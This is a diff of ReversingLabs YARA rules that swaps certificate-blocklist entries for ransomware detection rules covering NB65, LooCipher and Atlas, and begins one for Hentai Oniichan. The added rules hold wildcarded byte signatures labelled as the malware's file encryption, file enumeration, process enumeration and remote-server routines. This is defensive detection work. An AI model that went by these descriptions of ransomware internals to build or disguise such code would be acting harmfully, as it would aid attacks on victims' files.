+		description = "Yara rule that detects NB65 ransomware."
 		author = "ReversingLabs"
-		id = "176434ae-7162-5b35-91f7-888536250884"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "1aba009e-8065-5fb0-98e7-a595cb324076"
+		date = "2022-06-01"
+		modified = "2022-06-01"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2730-L2748"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.NB65.yara#L1-L68"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "08fcff795297c0608b1a1d71465279cbf76d4dff06de2a2262a58debbb2f9e0d"
+		logic_hash = "f8a0e265fc72a9f017b37ce4b6dbb878285a5d298ab1b8c69f9fde7159426981"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "NB65"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            E8 ?? ?? ?? ?? 89 45 ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ??
+            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ??
+            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ??
+            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ??
+            C6 45 ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8A 45 ?? 80 7D ?? ?? 75 ?? 33 C9 90 8A 44 0D ??
+            0F B6 C0 83 E8 ?? 6B C0 ?? 99 F7 FB 8D 42 ?? 99 F7 FB 88 54 0D ?? 41 83 F9 ?? 72 ??
+            8D 45 ?? 89 45 ?? A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 50
+            ?? 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 81 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF D0
+            85 C0 75 ?? 33 F6 66 90 A1 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ??
+            8D 50 ?? 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 81 ?? ?? ?? ?? FF B4 B5 ?? ?? ??
+            ?? 57 FF D0 85 C0 75 ?? 46 83 FE ?? 7C ?? 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3
+        }
+		$find_files = {
+            57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ?? ?? 83 FE ?? 75 ?? 50 57 57
+            53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ??
+            5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ??
+            80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 80 BD ?? ??
+            ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ??
+            8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
+        }
+		$enum_procs = {
+            33 C9 66 90 8A 84 0D ?? ?? ?? ?? 0F B6 C0 83 E8 ?? 8D 04 C0 99 F7 BD ?? ?? ?? ?? 8D
+            42 ?? 99 F7 BD ?? ?? ?? ?? 88 94 0D ?? ?? ?? ?? 41 83 F9 ?? 72 ?? A1 ?? ?? ?? ?? 8B
+            40 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 33 D2 33 C9 E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 41
+            ?? 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? 51 FF D0 85 C0 75 ?? 6A ?? E8 ?? ?? ?? ??
+            83 C4 ?? 85 C0 74 ?? C7 00 ?? ?? ?? ?? 8D 50 ?? 8B 8D ?? ?? ?? ?? 89 08 C7 02 ?? ??
+            ?? ?? 8B 4E ?? 89 48 ?? 8B 4E ?? 89 01 89 56 ?? 8D 85 ?? ?? ?? ?? 50 57 FF D3 85 C0
+            0F 85 ?? ?? ?? ?? 5B A1 ?? ?? ?? ?? 8B 40 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 33 D2 33 C9
+            E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 41 ?? 57 FF D0 8B 4D ?? 5F 33 CD 5E E8 ?? ?? ??
+            ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x94\\x90\\xE5\\xB1\\xB1\\xE4\\xB8\\x87\\xE4\\xB8\\x9C\\xE6\\xB6\\xA6\\xE6\\x92\\xAD\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and ( pe.signatures [ i ] . serial == "00:f6:2c:9c:4e:fc:81:ca:f0:d5:a2:60:80:09:d4:80:18" or pe.signatures [ i ] . serial == "f6:2c:9c:4e:fc:81:ca:f0:d5:a2:60:80:09:d4:80:18" ) and 1292889599 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $enum_procs ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_Cc8D902Da36587C9B2113Cd76C3C3F8D : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Loocipher : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects LooCipher ransomware."
 		author = "ReversingLabs"
-		id = "f9e542aa-eaa5-50a5-95dc-fb55f8575c89"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "b5aa2bd0-72b0-5013-a60e-9b4f1ee1de1f"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2750-L2768"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.LooCipher.yara#L1-L87"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "25e524d23ccc1c06f602a086369ffd44b8c97b76c29f068764081339556b3465"
+		logic_hash = "aa0598d63b5fad6aea0945a0aa2030d3d6e2cd9f1fea16f3dd17cdceb68323e3"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "LooCipher"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$remote_connection = {
+            6A ?? 83 EC ?? 8B CC 89 A5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 B9 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ??
+            50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 68 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50
+            8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
+            83 C4 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? E8
+        }
+		$encrypt_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? 53 56 57 8D BD
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? F3 AB A1 ?? ?? ?? ?? 33 C5 89 45 ?? 50 8D
+            45 ?? 64 A3 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F B7 4D ?? 3B C1 74
+            ?? E8 ?? ?? ?? ?? 8B F0 8D 4D ?? E8 ?? ?? ?? ?? 8B C8 83 E9 ?? 8B C6 33 D2 F7 F1 89
+            55 ?? 6A ?? 8B 45 ?? 50 8D 8D ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 50 8D 4D ?? E8
+            ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8D 45 ?? 50 8B 4D ??
+            E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 83 C9 ?? 89 8D ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 52 8B CD 50 8D 15
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 58 5A 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ??
+            33 CD E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 3B EC E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$find_files = {
+            52 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? B9
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 0F B6 C0 85 C0 0F 84 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8B F4 89
+            A5 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 50 ?? 52 8B 00 50 8B CE E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C6 45 ?? ?? B9
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 6A ?? 8D 8D ?? ?? ?? ?? 51 C6 45 ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50
+            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            68 ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? EB ?? 83 EC ?? 8B CC
+            89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            83 C4 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52
+            B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 8D
+            ?? ?? ?? ?? 89 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 B9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE4\\xB8\\x8A\\xE6\\xB5\\xB7\\xE9\\x87\\x91\\xE4\\xBF\\x8A\\xE5\\x9D\\xA4\\xE8\\xAE\\xA1\\xE7\\xAE\\x97\\xE6\\x9C\\xBA\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x8D\\xE5\\x8A\\xA1\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and ( pe.signatures [ i ] . serial == "00:cc:8d:90:2d:a3:65:87:c9:b2:11:3c:d7:6c:3c:3f:8d" or pe.signatures [ i ] . serial == "cc:8d:90:2d:a3:65:87:c9:b2:11:3c:d7:6c:3c:3f:8d" ) and 1292544000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_328Bdcc0F679C4649147Fbb3Eb0E9Bc6 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Atlas : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Atlas ransomware."
 		author = "ReversingLabs"
-		id = "8e2c2204-8905-5e05-9ec8-e1577ae4c2cb"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "2c702b24-4b7e-505c-a694-0d915cc47315"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L2770-L2786"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Atlas.yara#L1-L99"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6d9e1f25ca252ca9dda7714c52a2e57fd3b5dca08cd2a45c9dec18a31d3bb342"
+		logic_hash = "1486f931ec096a00d913de0568ddd8aa5a091256445bc28aba90e3e194ebd045"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Atlas"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            8B 74 24 ?? 8B 3D ?? ?? ?? ?? 8D 4C 24 ?? 6A ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 52 56 FF D7 8B 94 24 ?? ?? ?? ?? 8D 44 24 ?? 8D 8C 24 ?? ?? ?? ?? 50 8B 84 24 ??
+            ?? ?? ?? 51 52 50 E8 ?? ?? ?? ?? 8B 54 24 ?? 83 C4 ?? 8D 4C 24 ?? 8D 84 24 ?? ?? ??
+            ?? 6A ?? 51 8B 4C 24 ?? 52 50 51 FF 15 ?? ?? ?? ?? 8D 54 24 ?? 6A ?? 52 55 53 56 FF
+            D7 8B 7C 24 ?? 33 C9 3B FD 89 4C 24 ?? 0F 85 ?? ?? ?? ?? EB ?? 8B 4C 24 ?? 33 F6 8A
+            84 34 ?? ?? ?? ?? 02 C1 F6 E9 88 44 34 ?? 8A 84 34 ?? ?? ?? ?? 02 C1 F6 E9 88 44 34
+            ?? 46 83 FE ?? 7C ?? 8B 74 24 ?? 57 56 8D 44 24 ?? 53 8D 8C 24 ?? ?? ?? ?? 50 51 E8
+            ?? ?? ?? ?? 8B 54 24 ?? 8D 84 24 ?? ?? ?? ?? 52 53 56 8D 8C 24 ?? ?? ?? ?? 50 51 E8
+            ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 83 C4 ?? 8D 54 24 ?? 6A ?? 52 50 53 51 FF 15 ??
+            ?? ?? ?? 8B 44 24 ?? 8D 54 24 ?? 6A ?? 52 55 53 50 FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B
+            7C 24 ?? 41 3B FD 89 4C 24 ?? 0F 84 ?? ?? ?? ?? 8B 74 24 ?? 85 FF 74 ?? 8B 54 24 ??
+            8D 4C 24 ?? 6A ?? 51 57 53 52 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 8B 44 24
+            ?? 50 FF D6 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 53 FF D6 8B 4C 24 ?? 68 ?? ?? ??
+            ?? 6A ?? 51 FF D6 5F 5E 5D 33 C0 5B 81 C4 ?? ?? ?? ?? C3
+        }
+		$remote_server_1 = {
+            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 33 C9 8D 94 24 ?? ?? ?? ?? 8A 0C 2E
+            8D 84 24 ?? ?? ?? ?? 51 52 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 46 81 FE ?? ??
+            ?? ?? 7C ?? 8D 8C 24 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 52 E8 ?? ??
+            ?? ?? 83 C4 ?? 33 F6 33 C0 8D 8C 24 ?? ?? ?? ?? 8A 04 1E 8D 94 24 ?? ?? ?? ?? 50 51
+            68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 46 81 FE ?? ?? ?? ?? 7C ?? 8D 84 24 ?? ??
+            ?? ?? 8D BC 24 ?? ?? ?? ?? 50 83 C9 ?? 33 C0 33 F6 F2 AE F7 D1 49 51 8D 8C 24 ?? ??
+            ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 83 FE ??
+            0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 46 FF 15 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 83 C9 ??
+            33 C0 8D 94 24 ?? ?? ?? ?? F2 AE F7 D1 49 52 8D 84 24 ?? ?? ?? ?? 51 50 68 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? BE ?? ?? ?? ?? 8D 84 24 ?? ??
+            ?? ?? 8A 10 8A 1E 8A CA 3A D3 75 ?? 84 C9 74 ?? 8A 50 ?? 8A 5E ?? 8A CA 3A D3 75 ??
+            83 C0 ?? 83 C6 ?? 84 C9 75 ?? 33 C0 EB
+        }
+		$remote_server_2 = {
+            68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 51 2B D8 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 52 03 D8 E8 ?? ?? ?? ?? 8B CB 8B F0 8B C1 83 C6 ?? 8D BC 24 ?? ?? ?? ?? 83 C4
+            ?? C1 E9 ?? F3 A5 8B C8 68 ?? ?? ?? ?? 83 E1 ?? 68 ?? ?? ?? ?? F3 A4 8D 8C 24 ?? ??
+            ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 94 24 ?? ?? ?? ?? BB
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 2B D8 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ??
+            ?? ?? ?? 03 D8 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B CB 8B F0 8B
+            D1 BF ?? ?? ?? ?? C1 E9 ?? F3 A5 83 C4 ?? 8B CA 83 E1 ?? 8D 84 24 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? F3 A4 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            BB ?? ?? ?? ?? 2B D8 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 50 E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 03 D8 E8 ??
+            ?? ?? ?? 8B CB 8B F0 8B C1 83 C6 ?? BF ?? ?? ?? ?? 68 ?? ?? ?? ?? C1 E9 ?? F3 A5 8B
+            C8 68 ?? ?? ?? ?? 83 E1 ?? F3 A4 E8 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 83 C9 ?? 33 C0
+            83 C4 ?? F2 AE F7 D1 49 83 F9 ?? 0F 82 ?? ?? ?? ?? 33 F6 8D BC 24 ?? ?? ?? ?? 8D 8C
+            34 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 46 83 C7 ?? 81 FE ?? ??
+            ?? ?? 72 ?? 8B 3D ?? ?? ?? ?? FF D7 8D 94 24 ?? ?? ?? ?? 56 52 8B E8 E8 ?? ?? ?? ??
+            83 C4 ?? FF D7 8B F0 8D 44 24 ?? 50 2B F5 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            4C 24 ?? 8D 94 24 ?? ?? ?? ?? 51 56 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ??
+            8D 84 24 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 50 83 C9 ?? 33 C0 F2 AE F7 D1 49 51 8D 8C
+            24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
+        }
+		$send_post_packet = {
+            68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 83
+            FE ?? 89 75 ?? 75 ?? 50 E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B
+            8B E5 5D C3 6A ?? 66 C7 45 ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 66 89 45 ?? 52 E8 ?? ??
+            ?? ?? 89 45 ?? 8D 45 ?? 6A ?? 50 56 E8 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 E8 ?? ?? ?? ??
+            33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 8D BD ?? ?? ?? ?? 83 C9 ??
+            33 C0 6A ?? F2 AE F7 D1 49 51 8D 8D ?? ?? ?? ?? 51 56 E8 ?? ?? ?? ?? 83 F8 ?? 75 ??
+            56 E8 ?? ?? ?? ?? 33 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$send_get_request = {
+            68 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 83
+            FB ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 5F 5E 5D 33
+            C0 5B 81 C4 ?? ?? ?? ?? C3 6A ?? 66 C7 44 24 ?? ?? ?? E8 ?? ?? ?? ?? 8D 54 24 ?? 66
+            89 44 24 ?? 52 E8 ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 6A ?? 50 53 E8 ?? ?? ?? ?? 83
+            F8 ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 5F 5E 5D 33
+            C0 5B 81 C4 ?? ?? ?? ?? C3 8B FD 83 C9 ?? 33 C0 6A ?? F2 AE F7 D1 49 51 55 53 E8 ??
+            ?? ?? ?? 83 F8 ?? 75 ?? 68 ?? ?? ?? ?? 6A ?? 55 FF 15 ?? ?? ?? ?? 53 E8 ?? ?? ?? ??
+            5F 5E 5D 33 C0 5B 81 C4 ?? ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nooly Systems LTD" and pe.signatures [ i ] . serial == "32:8b:dc:c0:f6:79:c4:64:91:47:fb:b3:eb:0e:9b:c6" and 1204847999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $encrypt_files and $remote_server_1 and $remote_server_2 and $send_post_packet and $send_get_request
 }
-
-rule REVERSINGLABS_Cert_Blocklist_5F78149Eb4F75Eb17404A8143Aaeaed7 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Hentaioniichan : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Hentai Oniichan ransomware."
 		author = "ReversingLabs"
-		id = "4c9d3bba-4e7f-5bf5-ab90-f2b900ec0b2a"
-		date = "2020-08-05"
